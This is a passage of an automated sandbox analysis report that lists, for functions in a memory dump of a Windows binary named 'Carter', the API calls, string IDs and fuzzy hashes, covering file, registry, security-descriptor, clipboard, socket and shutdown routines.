                                                                            Function 002DF5D8 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 119fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 002DF5F9
                                                                            • _wcscmp.LIBCMT ref: 002DF60E
                                                                            • _wcscmp.LIBCMT ref: 002DF625
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 002DF637
                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 002DF651
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 002DF669
                                                                            • FindClose.KERNEL32(00000000), ref: 002DF674
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 002DF690
                                                                            • _wcscmp.LIBCMT ref: 002DF6B7
                                                                            • _wcscmp.LIBCMT ref: 002DF6CE
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 002DF6E0
                                                                            • SetCurrentDirectoryW.KERNEL32(0032B578), ref: 002DF6FE
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 002DF708
                                                                            • FindClose.KERNEL32(00000000), ref: 002DF715
                                                                            • FindClose.KERNEL32(00000000), ref: 002DF727
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                            • String ID: *.*$S-
                                                                            • API String ID: 1803514871-3250822365
                                                                            • Opcode ID: d918b010e3c506237bd0f17af0b46c428828bfde51cbcf2f9cf10f3cfcc101e0
                                                                            • Instruction ID: e57db15a4e1fb2ce93f13a08791cc741e685a69c130d02d89de62ed93cb4f498
                                                                            • Opcode Fuzzy Hash: d918b010e3c506237bd0f17af0b46c428828bfde51cbcf2f9cf10f3cfcc101e0
                                                                            • Instruction Fuzzy Hash: C131363161121A6BDF15DFB4ED59AEEB3ACAF09321F100167F816D32A0DB30DE54CA64
                                                                            Function 002DCD9F Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 002DCDD0
                                                                            • FindClose.KERNEL32(00000000), ref: 002DCE24
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002DCE49
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 002DCE60
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 002DCE87
                                                                            • __swprintf.LIBCMT ref: 002DCED3
                                                                            • __swprintf.LIBCMT ref: 002DCF16
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                            • __swprintf.LIBCMT ref: 002DCF6A
                                                                              • Part of subcall function 002938C8: __woutput_l.LIBCMT ref: 00293921
                                                                            • __swprintf.LIBCMT ref: 002DCFB8
                                                                              • Part of subcall function 002938C8: __flsbuf.LIBCMT ref: 00293943
                                                                              • Part of subcall function 002938C8: __flsbuf.LIBCMT ref: 0029395B
                                                                            • __swprintf.LIBCMT ref: 002DD007
                                                                            • __swprintf.LIBCMT ref: 002DD056
                                                                            • __swprintf.LIBCMT ref: 002DD0A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                            • API String ID: 3953360268-2428617273
                                                                            • Opcode ID: a9acb8789e4dbcb83914511f253893b800f6be26e2cec0daee1c93fce672ed19
                                                                            • Instruction ID: 99c5facb6557181295534339752ddd2ad13cf9f803e6e61fb2cb6a7f89143b0a
                                                                            • Opcode Fuzzy Hash: a9acb8789e4dbcb83914511f253893b800f6be26e2cec0daee1c93fce672ed19
                                                                            • Instruction Fuzzy Hash: 63A15EB1425305ABC714FFA4D885EAFB7ECEF94700F40491AF589C6191EB70EA19CB62
                                                                            Function 002F0EB7 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002F0FB3
                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00300980,00000000,?,00000000,?,?), ref: 002F1021
                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 002F1069
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 002F10F2
                                                                            • RegCloseKey.ADVAPI32(?), ref: 002F1412
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 002F141F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectCreateRegistryValue
                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                            • API String ID: 536824911-966354055
                                                                            • Opcode ID: 55d138dac597d0b9efa7e3de0f584701a06aeac16edbe0bb7e5e9d685e471663
                                                                            • Instruction ID: 1db5d77875a37b0cf3ef1f7e7090ebf85100a470a03c9faac176783838156de3
                                                                            • Opcode Fuzzy Hash: 55d138dac597d0b9efa7e3de0f584701a06aeac16edbe0bb7e5e9d685e471663
                                                                            • Instruction Fuzzy Hash: 4B025975220611DFCB14EF25C891A2AB7E5FF89714F04856DF9899B2A2CB30ED21CF81
                                                                            Function 002DF735 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 112fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 002DF756
                                                                            • _wcscmp.LIBCMT ref: 002DF76B
                                                                            • _wcscmp.LIBCMT ref: 002DF782
                                                                              • Part of subcall function 002D4875: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 002D4890
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 002DF7B1
                                                                            • FindClose.KERNEL32(00000000), ref: 002DF7BC
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 002DF7D8
                                                                            • _wcscmp.LIBCMT ref: 002DF7FF
                                                                            • _wcscmp.LIBCMT ref: 002DF816
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 002DF828
                                                                            • SetCurrentDirectoryW.KERNEL32(0032B578), ref: 002DF846
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 002DF850
                                                                            • FindClose.KERNEL32(00000000), ref: 002DF85D
                                                                            • FindClose.KERNEL32(00000000), ref: 002DF86F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                            • String ID: *.*$j-
                                                                            • API String ID: 1824444939-1844594218
                                                                            • Opcode ID: 10b7ac8539bf087af7d078210640d5b1d8b651679430d303a7b7a51d5e8c413e
                                                                            • Instruction ID: 0019db4817a53bc9a7e8ee5e82479cc5b4453848d200cf07987ce75b98cebfae
                                                                            • Opcode Fuzzy Hash: 10b7ac8539bf087af7d078210640d5b1d8b651679430d303a7b7a51d5e8c413e
                                                                            • Instruction Fuzzy Hash: 3D31287150121A6BEF15EFB4DD58AEEB3AC9F09320F100167F805E22A1DB30DE65DB64
                                                                            Function 002C88CD Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002C8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002C8E3C
                                                                              • Part of subcall function 002C8E20: GetLastError.KERNEL32(?,002C8900,?,?,?), ref: 002C8E46
                                                                              • Part of subcall function 002C8E20: GetProcessHeap.KERNEL32(00000008,?,?,002C8900,?,?,?), ref: 002C8E55
                                                                              • Part of subcall function 002C8E20: HeapAlloc.KERNEL32(00000000,?,002C8900,?,?,?), ref: 002C8E5C
                                                                              • Part of subcall function 002C8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002C8E73
                                                                              • Part of subcall function 002C8EBD: GetProcessHeap.KERNEL32(00000008,002C8916,00000000,00000000,?,002C8916,?), ref: 002C8EC9
                                                                              • Part of subcall function 002C8EBD: HeapAlloc.KERNEL32(00000000,?,002C8916,?), ref: 002C8ED0
                                                                              • Part of subcall function 002C8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,002C8916,?), ref: 002C8EE1
                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 002C8931
                                                                            • _memset.LIBCMT ref: 002C8946
                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 002C8965
                                                                            • GetLengthSid.ADVAPI32(?), ref: 002C8976
                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 002C89B3
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 002C89CF
                                                                            • GetLengthSid.ADVAPI32(?), ref: 002C89EC
                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 002C89FB
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 002C8A02
                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 002C8A23
                                                                            • CopySid.ADVAPI32(00000000), ref: 002C8A2A
                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 002C8A5B
                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 002C8A81
                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 002C8A95
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                            • String ID:
                                                                            • API String ID: 3996160137-0
                                                                            • Opcode ID: 73e914d4848883f6c1f89459de9760b6b0888b519395af364afbdd90ed29305b
                                                                            • Instruction ID: 2d8ba42dd1f4c8df2919229687b194bb6d529996518fea84e272c847321767b7
                                                                            • Opcode Fuzzy Hash: 73e914d4848883f6c1f89459de9760b6b0888b519395af364afbdd90ed29305b
                                                                            • Instruction Fuzzy Hash: 0561367595020AAFDF05DFA5DC55FEEBB79FF04300F04822AE816A6290DB319A25CF60
                                                                            Function 002F0A3A Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002F040D,?,?), ref: 002F1491
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002F0B0C
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002F0BAB
                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002F0C43
                                                                            • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 002F0E82
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 002F0E8F
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 1240663315-0
                                                                            • Opcode ID: bab720af6d26f5ed759813afc4d78f9bc728c27641d6ecfe148b289a426b3ea0
                                                                            • Instruction ID: f1a8bdf0a98516f7a189fb46e65d5f76b3198c8f8b7e385a4ccaa4b802a2a0c4
                                                                            • Opcode Fuzzy Hash: bab720af6d26f5ed759813afc4d78f9bc728c27641d6ecfe148b289a426b3ea0
                                                                            • Instruction Fuzzy Hash: 84E16E31214215AFCB14DF24C991E2ABBE8EF89754F04896DF949DB2A2DB30ED21CF51
                                                                            Function 002D443D Relevance: 15.1, APIs: 10, Instructions: 108windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __swprintf.LIBCMT ref: 002D4451
                                                                            • __swprintf.LIBCMT ref: 002D445E
                                                                              • Part of subcall function 002938C8: __woutput_l.LIBCMT ref: 00293921
                                                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 002D4488
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 002D4494
                                                                            • LockResource.KERNEL32(00000000), ref: 002D44A1
                                                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 002D44C1
                                                                            • LoadResource.KERNEL32(?,00000000), ref: 002D44D3
                                                                            • SizeofResource.KERNEL32(?,00000000), ref: 002D44E2
                                                                            • LockResource.KERNEL32(?), ref: 002D44EE
                                                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 002D454F
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                            • String ID:
                                                                            • API String ID: 1433390588-0
                                                                            • Opcode ID: 105021892b9c1d96b76e446c393ed05480d5d5bac64a562e9ad3e23171463326
                                                                            • Instruction ID: e2066363a8881a15afc2105853eeecc422b7e2d9d805e786c61423640299a409
                                                                            • Opcode Fuzzy Hash: 105021892b9c1d96b76e446c393ed05480d5d5bac64a562e9ad3e23171463326
                                                                            • Instruction Fuzzy Hash: AB319E7151121AABDF16AF60EC98EBB7BACFF04301F404826F956D2250DB74DE21CBA4
                                                                            Function 002E4830 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                            • String ID:
                                                                            • API String ID: 1737998785-0
                                                                            • Opcode ID: e76e420c5d57593b1c7496bf9b546208afb9b3b902da54ec6c9d22d3bf37ad9f
                                                                            • Instruction ID: 9313c4d76cd8b873ae2c72cbdfe632fbeab8476eb67c73ae61c1d052f3e1c1e2
                                                                            • Opcode Fuzzy Hash: e76e420c5d57593b1c7496bf9b546208afb9b3b902da54ec6c9d22d3bf37ad9f
                                                                            • Instruction Fuzzy Hash: 2321A1312522519FDB16BF25EC59F2E77ADEF44721F00801AF94A9B2A1CB71AD208F94
                                                                            Function 002DFA36 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                            • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 002DFA83
                                                                            • FindClose.KERNEL32(00000000), ref: 002DFB96
                                                                              • Part of subcall function 002752B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 002752E6
                                                                            • Sleep.KERNEL32(0000000A), ref: 002DFAB3
                                                                            • _wcscmp.LIBCMT ref: 002DFAC7
                                                                            • _wcscmp.LIBCMT ref: 002DFAE2
                                                                            • FindNextFileW.KERNEL32(?,?), ref: 002DFB80
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File_wcscmp$CloseFirstMessageNextPeekSleep_memmove
                                                                            • String ID: *.*
                                                                            • API String ID: 2185952417-438819550
                                                                            • Opcode ID: d6b507aa0b166fa5cf6196433ea6091e0ce68ab925ecc03e240ed065ef714e8e
                                                                            • Instruction ID: 651ec1eeab0415f19a04a7c8c7f53fb0980b8838d41d80333eac5b331c3530bc
                                                                            • Opcode Fuzzy Hash: d6b507aa0b166fa5cf6196433ea6091e0ce68ab925ecc03e240ed065ef714e8e
                                                                            • Instruction Fuzzy Hash: 3241B17592121A9FCF55DF64CD58AEEBBB8FF09300F144067E819A2291EB309E64CF90
                                                                            Function 002D5778 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002C9399: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002C93E3
                                                                              • Part of subcall function 002C9399: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002C9410
                                                                              • Part of subcall function 002C9399: GetLastError.KERNEL32 ref: 002C941D
                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 002D57B4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                            • String ID: $@$SeShutdownPrivilege
                                                                            • API String ID: 2234035333-194228
                                                                            • Opcode ID: ea19ebda6f380de72f9d67062bed9edf1f6293a51be51cae1f0969c630e05e3c
                                                                            • Instruction ID: 59e81a8d8658d9ae59aa4ad103f8d637f95a18a0e838cf3257917cb6d0fe7d5a
                                                                            • Opcode Fuzzy Hash: ea19ebda6f380de72f9d67062bed9edf1f6293a51be51cae1f0969c630e05e3c
                                                                            • Instruction Fuzzy Hash: B501F731775733EAF7286A649C8AFBBF25CAB04750F34052BF953D62D2DAD05C208550
                                                                            Function 002E696E Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002E69C7
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002E69D6
                                                                            • bind.WSOCK32(00000000,?,00000010), ref: 002E69F2
                                                                            • listen.WSOCK32(00000000,00000005), ref: 002E6A01
                                                                            • WSAGetLastError.WSOCK32(00000000), ref: 002E6A1B
                                                                            • closesocket.WSOCK32(00000000,00000000), ref: 002E6A2F
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                                            • String ID:
                                                                            • API String ID: 1279440585-0
                                                                            • Opcode ID: a242988d9c3b8499c884753c2b01ea84812558247c809cb1c25eb5ef5b37014c
                                                                            • Instruction ID: 6817465e98b87cd1526535bb614afbaec6779d827a60db7ddb747aa6d8e8c071
                                                                            • Opcode Fuzzy Hash: a242988d9c3b8499c884753c2b01ea84812558247c809cb1c25eb5ef5b37014c
                                                                            • Instruction Fuzzy Hash: 9C21DD30650201AFCB10EF68C999B3EB7A9EF48720F148159E95AA7392CB70AC11CF91
                                                                            Function 00271663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 00271DD6
                                                                            • GetSysColor.USER32(0000000F), ref: 00271E2A
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00271E3D
                                                                              • Part of subcall function 0027166C: DefDlgProcW.USER32(?,00000020,?), ref: 002716B4
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ColorProc$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 3744519093-0
                                                                            • Opcode ID: 232270a2e63c76f9ec71a075de32e6eb84f42d83da35d5ad860cf8623c1937d8
                                                                            • Instruction ID: 7121b646820cf5bca2d049f07314f8be803260807f1d7f1f49e854d2f29691a2
                                                                            • Opcode Fuzzy Hash: 232270a2e63c76f9ec71a075de32e6eb84f42d83da35d5ad860cf8623c1937d8
                                                                            • Instruction Fuzzy Hash: FDA145B413540ABBD73A6E6D8C49E7B255EDF43301F24811BF40AC6192CE708D31DAB6
                                                                            Function 002DC2FF Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 002DC329
                                                                            • _wcscmp.LIBCMT ref: 002DC359
                                                                            • _wcscmp.LIBCMT ref: 002DC36E
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 002DC37F
                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 002DC3AF
                                                                            Memory Dump Source
